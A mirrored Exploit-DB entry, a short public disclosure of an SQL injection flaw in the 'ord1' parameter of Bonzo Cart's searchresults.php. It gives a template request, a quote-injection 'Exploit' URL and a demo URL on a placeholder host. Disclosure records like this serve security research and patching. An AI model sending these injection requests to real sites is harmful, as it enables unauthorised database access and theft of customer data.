exploit-db-mirror/exploits/php/webapps/17709.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

20 lines
No EOL
550 B
Text

# Exploit Title: Bonzo Cart (E-Commerce System) SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.turnkeycentral.com
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
SQL Injection can be done using the command input
Example
searchresults.php?ord1=<SQL Injection
Code>&ord2=asc&search1=&SearchTerm=&where=ItemName
Exploit:
searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName
Demo:
http://site.com/bonzacart/searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName